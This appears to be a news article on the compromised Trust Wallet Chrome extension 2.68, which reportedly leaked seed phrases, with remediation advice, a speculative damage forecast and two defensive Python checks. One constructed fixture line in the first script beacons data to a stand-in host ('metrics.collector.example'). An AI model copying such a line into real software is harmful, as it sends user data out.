Trust Wallet Chrome Extension: Hidden Script Collects Private Keys, Causing Losses of Up to $7 Million

Serious Security Incident: Version 2.68 Exposes User Seed Phrases

On December 24-25, 2025, Trust Wallet issued an urgent warning telling Chrome users to stop using version 2.68 of the extension. The company discovered a security vulnerability in the code execution process that allowed users' seed phrases and private keys to be collected unlawfully. Initial reports indicate total damages of approximately $6-7 million across multiple blockchains within the first 48-72 hours.

The Trust Wallet extension on the Chrome Web Store currently has about 1 million installed users. The actual impact depends on how many users updated to version 2.68 and entered sensitive information during the vulnerability window. Trust Wallet confirms that mobile versions and other platforms are unaffected.

Attack Mechanism: Malicious JavaScript Code Collects Wallet Secrets

Security researchers identified suspicious logic within the 2.68 installation package. Specifically, in a JavaScript file referencing “4482.js,” analysts found that this code could transmit seed phrases and private keys to an external server.

A seed phrase is a sequence of words capable of unlocking all current and future addresses generated from it. This means that if the seed phrase is compromised, the entire wallet and assets across different chains are at risk of being drained. The investigation team identified the highest risk for users who entered or restored seed phrases after installing the faulty version.
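One review check for the kind of change described above is to list hostnames that appear as literal URLs in a new extension build but not in the previous one. This is an added example, not code from Trust Wallet or the researchers; the directory layout, file names and `.example` hosts are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Literal http(s)/ws(s) URLs in script text; stops at quotes, whitespace, backticks.
URL_RE = re.compile(r"""(?:https?|wss?)://[^\s"'`<>\\)]+""")


def hosts_by_file(root: Path) -> dict:
    """Map each hostname found in *.js under root to the files that mention it."""
    found = {}
    for path in sorted(root.rglob("*.js")):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for url in URL_RE.findall(text):
            try:
                host = urlsplit(url).hostname
            except ValueError:
                continue  # malformed URL literal
            if host:
                found.setdefault(host.lower(), set()).add(rel)
    return found


def new_hosts(old_root: Path, new_root: Path, allowlist=frozenset()) -> dict:
    """Hosts referenced only by the new version, minus already-reviewed ones."""
    old, new = hosts_by_file(old_root), hosts_by_file(new_root)
    return {h: sorted(f) for h, f in new.items()
            if h not in old and h not in allowlist}


def build_sample_versions(base: Path):
    """Constructed sample: two tiny unpacked 'versions' with reserved .example hosts."""
    old, new = base / "old", base / "new"
    for d in (old, new):
        d.mkdir(parents=True)
    (old / "background.js").write_text('fetch("https://rpc.wallet.example/v1");\n')
    (new / "background.js").write_text('fetch("https://rpc.wallet.example/v1");\n')
    (new / "chunk.js").write_text(
        'const u="https://metrics.collector.example/api";navigator.sendBeacon(u,d);\n')
    return old, new


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        old_dir, new_dir = build_sample_versions(Path(tmp))
        for host, files in new_hosts(old_dir, new_dir).items():
            print(f"new host {host} in {', '.join(files)}")
```

The check only sees hosts written as literal URLs, so a clean result narrows a manual review of an update but does not replace it.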

Necessary Action: Updating Is Not Enough, Assets Must Be Transferred

Updating to version 2.69 can remove the malicious code from the extension going forward, but this does not automatically protect assets if the seed phrase was compromised earlier.

If you entered or restored your seed phrase while using version 2.68, consider that seed compromised. Standard remediation steps include:

  • Creating a completely new seed phrase
  • Transferring all assets to a wallet generated from the new seed phrase
  • Revoking token approvals on smart contracts if possible

These actions may incur costs due to cross-chain asset transfers. Users should weigh speed against gas fees, especially when dealing with cross-chain bridge transactions.
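To see which version of the extension each Chrome profile currently has on disk, the following added example (not Trust Wallet's tooling) reads the manifests under Chrome's user data directory. The extension ID is a placeholder because the article does not give it, and the assumption is that the manifest reports the release as `2.68` or `2.68.x`.

```python
import json
import tempfile
from pathlib import Path

# Assumption: placeholder. Use the ID shown for the extension on chrome://extensions.
EXTENSION_ID = "REPLACE_WITH_EXTENSION_ID"
AFFECTED = "2.68"  # affected release named in the article


def is_affected(version: str) -> bool:
    """Match 2.68 and 2.68.x (assumed manifest forms), not 2.680 or 2.69."""
    return version == AFFECTED or version.startswith(AFFECTED + ".")


def find_installs(user_data_dir: Path, extension_id: str = EXTENSION_ID) -> list:
    """Return sorted (profile, version, affected) for each copy on disk.

    Chrome unpacks extensions to <profile>/Extensions/<id>/<version>_N/.
    """
    results = []
    pattern = f"*/Extensions/{extension_id}/*/manifest.json"
    for manifest in user_data_dir.glob(pattern):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8-sig"))
            version = str(data["version"])
        except (OSError, ValueError, KeyError, TypeError):
            continue  # unreadable manifest: skip rather than guess
        results.append((manifest.parents[3].name, version, is_affected(version)))
    return sorted(results)


def build_sample_profiles(base: Path, ext_id: str) -> Path:
    """Constructed sample tree: two profiles holding different versions."""
    for profile, version in (("Default", "2.68.0"), ("Profile 1", "2.69.0")):
        d = base / profile / "Extensions" / ext_id / f"{version}_0"
        d.mkdir(parents=True)
        (d / "manifest.json").write_text(json.dumps({"version": version}))
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_profiles(Path(tmp), "a" * 32)  # constructed ID
        for profile, version, hit in find_installs(root, "a" * 32):
            print(f"{profile}: {version} {'AFFECTED' if hit else 'ok'}")
```

A profile that now shows only 2.69 may still have run 2.68 earlier, so a seed phrase entered during that window remains compromised regardless of the result.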

“Rescue” Scams Are Increasing

At the same time as the incident, secondary scam tactics have begun to emerge. Scammers create fake “recovery” domains to trick users into revealing seed phrases under the guise of “wallet recovery support.”

Trust Wallet advises users not to interact with any messages not from official channels. Attackers may impersonate Trust Wallet support to target victims. Always verify the source of any seed phrase-related requests.

Broader Issue: Extensions as a Security Weak Point for Wallets

This incident highlights a fundamental risk of browser extensions. They occupy a sensitive position between web applications and transaction signing processes, allowing them to interfere with information users rely on to verify transactions.

Academic research on the Chrome Web Store shows that malicious or compromised extensions can evade automated moderation. As attack strategies evolve over time, detection capabilities diminish. This is especially concerning for wallet updates where client-side code is complex—making analysis more difficult.

Precedent: Software Distribution Process Integrity

The incident also raises questions about the integrity of software build and distribution processes. Long-term solutions may include:

  • Reproducible builds
  • Key separation
  • Clearer rollback procedures

These measures will help providers and platforms develop better verification methods and user guidance.

Market Data: Investors Still “Waiting and Watching”

Despite the serious incident, the TWT (Trust Wallet Token) market reflects mixed signals. As of January 12, 2026:

  • Current Price: $0.89
  • 24h Change: +0.13%
  • 24h High: $0.90
  • 24h Low: $0.86

This volatility indicates that investors have not yet fully priced the token in a single direction. Optimism may stem from Trust Wallet’s refund commitments or confidence in resolving the incident.

Damage Forecast: From $6-12 Million to $25 Million+ in 2-8 Weeks

Potential reasons the damage figure may continue to rise include:

  • Late victim reports
  • Reclassification of addresses
  • Improved tracking of cross-chain swap transactions

A realistic forecast range over the next 2-8 weeks can be divided into scenarios:

Scenario           | Estimated Damage | Probability
Controlled         | $6M–$12M         | 40%
Moderate Expansion | $15M–$25M        | 35%
Serious Review     | > $25M           | 25%

This depends on whether the collection method is limited to seed input on v2.68, whether additional attack vectors exist, and the speed of domain takedowns.

Timeline of the Incident

  • December 24: Version 2.68 deployed; reports of withdrawals begin
  • December 25: Trust Wallet releases version 2.69 with patches
  • First 48-72 hours: Total damages estimated at around $6-7 million

Final Recommendations from Trust Wallet

The company has now confirmed approximately $7 million affected and commits to refund all impacted users. Trust Wallet’s guidance:

  1. Immediately disable the version 2.68 extension in Chrome
  2. Update to version 2.69 from the Chrome Web Store
  3. If you entered a seed phrase on 2.68: consider it compromised, generate a new seed, and transfer assets
  4. Do not interact with unofficial messages—scammers may impersonate support
  5. Wait for official refund instructions from authorized channels

This incident serves as a reminder that, despite the convenience of extensions, users must carefully consider associated security risks.
